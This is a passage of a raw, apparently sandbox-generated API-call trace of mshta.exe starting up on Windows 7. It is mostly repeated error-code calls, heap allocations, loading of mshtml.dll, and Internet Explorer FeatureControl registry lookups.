(dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.101] SetLastError (dwErrCode=0x0) [0060.101] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.102] SetLastError (dwErrCode=0x0) [0060.102] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.103] SetLastError (dwErrCode=0x0) [0060.103] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.104] SetLastError (dwErrCode=0x0) [0060.104] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.105] GetLastError () returned 0x0 [0060.105] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.106] SetLastError (dwErrCode=0x0) [0060.106] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x264) returned 0x761610 [0060.107] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] GetLastError () returned 0x0 [0060.107] SetLastError (dwErrCode=0x0) [0060.107] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.108] SetLastError (dwErrCode=0x0) [0060.108] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.109] SetLastError (dwErrCode=0x0) [0060.109] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.110] SetLastError (dwErrCode=0x0) [0060.110] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.111] GetLastError () returned 0x0 [0060.111] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.112] SetLastError (dwErrCode=0x0) [0060.112] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.113] SetLastError (dwErrCode=0x0) [0060.113] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.114] SetLastError (dwErrCode=0x0) [0060.114] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.115] SetLastError (dwErrCode=0x0) [0060.115] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.116] SetLastError (dwErrCode=0x0) [0060.116] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.117] SetLastError (dwErrCode=0x0) [0060.117] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.118] GetLastError () returned 0x0 [0060.118] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.119] SetLastError (dwErrCode=0x0) [0060.119] GetLastError () returned 0x0 [0060.120] SetLastError (dwErrCode=0x0) [0060.120] GetLastError () returned 0x0 [0060.120] SetLastError (dwErrCode=0x0) [0060.120] GetLastError () returned 0x0 [0060.120] SetLastError (dwErrCode=0x0) [0060.120] GetLastError () returned 0x0 [0060.120] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x5fc) returned 0x761880 [0060.120] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x760e78 | out: hHeap=0x760000) returned 1 [0060.121] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x972aef) returned 0x0 [0060.122] GetLastError () returned 0x0 [0060.122] GetVersion () returned 0x1db10106 [0060.122] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0060.122] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0060.122] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.122] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x105) returned 0x761e88 [0060.122] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x105) returned 0x760e78 [0060.122] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x2cfad4 | out: phkResult=0x2cfad4*=0x42) returned 0x0 [0060.123] RegQueryValueExA (in: hKey=0x42, lpValueName=0x0, lpReserved=0x0, lpType=0x2cfacc, lpData=0x761e88, lpcbData=0x2cfac8*=0x105 | out: lpType=0x2cfacc*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x2cfac8*=0x1f) returned 0x0 [0060.123] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x74af0000 [0064.850] GetProcessHeap () returned 0x410000 [0064.850] GetVersion () returned 0x1db10106 [0064.850] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0064.850] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0064.850] HeapSetInformation (HeapHandle=0x410000, HeapInformationClass=0x0, HeapInformation=0x2cf760, HeapInformationLength=0x4) returned 1 [0064.926] malloc (_Size=0x80) returned 0x582640 [0064.926] GetVersion () returned 0x1db10106 [0065.003] GetVersionExA (in: lpVersionInformation=0x2cf638*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2cf638*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.003] __dllonexit () returned 0x74d1717c [0065.003] __dllonexit () returned 0x74d173bd [0065.003] GetProcessHeap () returned 0x410000 [0065.003] __dllonexit () returned 0x74d17435 [0065.003] __dllonexit () returned 0x74d16e75 [0065.003] __dllonexit () returned 0x74d16ff5 [0065.003] __dllonexit () returned 0x74d171be [0065.003] __dllonexit () returned 0x74d172e2 [0065.004] __dllonexit () returned 0x74d17320 [0065.004] __dllonexit () returned 0x74d17370 [0065.004] __dllonexit () returned 0x74d16e53 [0065.004] __dllonexit () returned 0x74d16e66 [0065.004] __dllonexit () returned 0x74d16a3e [0065.004] __dllonexit () returned 0x74d16a46 [0065.004] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0065.004] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0065.004] __dllonexit () returned 0x74d16a60 [0065.005] __dllonexit () returned 0x74d16a7a [0065.005] __dllonexit () returned 0x74d16a93 [0065.005] __dllonexit () returned 0x74d16aa7 [0065.005] __dllonexit () returned 0x74d16ac1 [0065.005] __dllonexit () returned 0x74d171f1 [0065.005] __dllonexit () returned 0x74d16ad0 [0065.005] __dllonexit () returned 0x74d16adf [0065.005] __dllonexit () returned 0x74d16aee [0065.005] __dllonexit () returned 0x74d16afd [0065.006] __dllonexit () returned 0x74d16b0d [0065.006] __dllonexit () returned 0x74d1720c [0065.006] __dllonexit () returned 0x74d16b1c [0065.006] __dllonexit () returned 0x74d16b2f [0065.006] __dllonexit () returned 0x74d16b49 [0065.006] __dllonexit () returned 0x74d16b58 [0065.006] __dllonexit () returned 0x74d16b67 [0065.006] __dllonexit () returned 0x74d16b76 [0065.006] __dllonexit () returned 0x74d16b85 [0065.006] __dllonexit () returned 0x74d16b94 [0065.007] __dllonexit () returned 0x74d16ba3 [0065.007] __dllonexit () returned 0x74d16bb2 [0065.007] __dllonexit () returned 0x74d16bc1 [0065.007] __dllonexit () returned 0x74d16bd0 [0065.007] __dllonexit () returned 0x74d16bdf [0065.007] __dllonexit () returned 0x74d16bee [0065.007] __dllonexit () returned 0x74d16bfd [0065.007] __dllonexit () returned 0x74d16c0c [0065.007] __dllonexit () returned 0x74d16c1b [0065.008] __dllonexit () returned 0x74d16c2a [0065.008] __dllonexit () returned 0x74d16c3d [0065.008] __dllonexit () returned 0x74d16c4c [0065.008] __dllonexit () returned 0x74d16c5b [0065.008] __dllonexit () returned 0x74d16c75 [0065.008] __dllonexit () returned 0x74d16c8f [0065.008] __dllonexit () returned 0x74d16ca9 [0065.008] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0065.008] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0065.008] __dllonexit () returned 0x74d16cb1 [0065.009] __dllonexit () returned 0x74d17294 [0065.009] __dllonexit () returned 0x74d16ccb [0065.009] __dllonexit () returned 0x74d16cd3 [0065.009] __dllonexit () returned 0x74d16ce2 [0065.009] __dllonexit () returned 0x74d16cf1 [0065.009] __dllonexit () returned 0x74d16d00 [0065.009] __dllonexit () returned 0x74d0f72d [0065.010] __dllonexit () returned 0x74d16d43 [0065.010] __dllonexit () returned 0x74d16d56 [0065.010] __dllonexit () returned 0x74d0f095 [0065.010] __dllonexit () returned 0x74d16d65 [0065.010] __dllonexit () returned 0x74d16d78 [0065.010] __dllonexit () returned 0x74d16d87 [0065.010] __dllonexit () returned 0x74d16d9a [0065.011] __dllonexit () returned 0x74d12256 [0065.011] __dllonexit () returned 0x74d1679d [0065.011] __dllonexit () returned 0x74d16dd5 [0065.011] __dllonexit () returned 0x74d16df8 [0065.011] __dllonexit () returned 0x74d16e07 [0065.011] __dllonexit () returned 0x74d176cb [0065.012] __dllonexit () returned 0x74d16e1a [0065.012] __dllonexit () returned 0x74d172aa [0065.012] __dllonexit () returned 0x74d172cb [0065.012] __dllonexit () returned 0x74d16e3a [0065.012] GetCurrentThreadId () returned 0x90 [0065.012] CoCreateGuid (in: pguid=0x7502ad20 | out: pguid=0x7502ad20*(Data1=0xf96bccdd, Data2=0xf58d, Data3=0x446e, Data4=([0]=0x80, [1]=0x38, [2]=0x9b, [3]=0x70, [4]=0xbf, [5]=0x8b, [6]=0xd6, [7]=0xb2))) returned 0x0 [0065.014] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x200) returned 0x42e830 [0065.014] __dllonexit () returned 0x74d1733d [0065.014] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cf0d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.014] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.014] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4 [0065.015] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8 [0065.015] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x42ea38 [0065.015] SHRegGetValueW () returned 0x2 [0065.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf324 | out: phkResult=0x2cf324*=0x0) returned 0x2 [0065.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf320 | out: phkResult=0x2cf320*=0x0) returned 0x2 [0065.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.084] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.104] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.104] RegCloseKey (hKey=0x0) returned 0x6 [0065.104] RegCloseKey (hKey=0x0) returned 0x6 [0065.104] RegCloseKey (hKey=0x94) returned 0x0 [0065.104] RegCloseKey (hKey=0x98) returned 0x0 [0065.105] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.105] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.105] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.105] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.105] RegCloseKey (hKey=0x0) returned 0x6 [0065.105] RegCloseKey (hKey=0x0) returned 0x6 [0065.105] RegCloseKey (hKey=0x98) returned 0x0 [0065.105] RegCloseKey (hKey=0x94) returned 0x0 [0065.105] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.105] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.106] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.106] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.106] RegCloseKey (hKey=0x0) returned 0x6 [0065.106] RegCloseKey (hKey=0x0) returned 0x6 [0065.106] RegCloseKey (hKey=0x94) returned 0x0 [0065.106] RegCloseKey (hKey=0x98) returned 0x0 [0065.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.106] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.106] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.106] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x9c) returned 0x0 [0065.107] SHRegGetValueW () returned 0x2 [0065.107] SHRegGetValueW () returned 0x2 [0065.107] RegCloseKey (hKey=0x9c) returned 0x0 [0065.107] RegCloseKey (hKey=0x0) returned 0x6 [0065.107] RegCloseKey (hKey=0x0) returned 0x6 [0065.107] RegCloseKey (hKey=0x98) returned 0x0 [0065.107] RegCloseKey (hKey=0x94) returned 0x0 [0065.107] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.107] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.107] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.107] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.107] RegCloseKey (hKey=0x0) returned 0x6 [0065.107] RegCloseKey (hKey=0x0) returned 0x6 [0065.107] RegCloseKey (hKey=0x94) returned 0x0 [0065.108] RegCloseKey (hKey=0x98) returned 0x0 [0065.108] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.108] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.108] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.108] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.108] RegCloseKey (hKey=0x0) returned 0x6 [0065.108] RegCloseKey (hKey=0x0) returned 0x6 [0065.108] RegCloseKey (hKey=0x98) returned 0x0 [0065.108] RegCloseKey (hKey=0x94) returned 0x0 [0065.108] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.109] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.109] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.109] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.109] RegCloseKey (hKey=0x0) returned 0x6 [0065.109] RegCloseKey (hKey=0x0) returned 0x6 [0065.109] RegCloseKey (hKey=0x94) returned 0x0 [0065.109] RegCloseKey (hKey=0x98) returned 0x0 [0065.109] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet 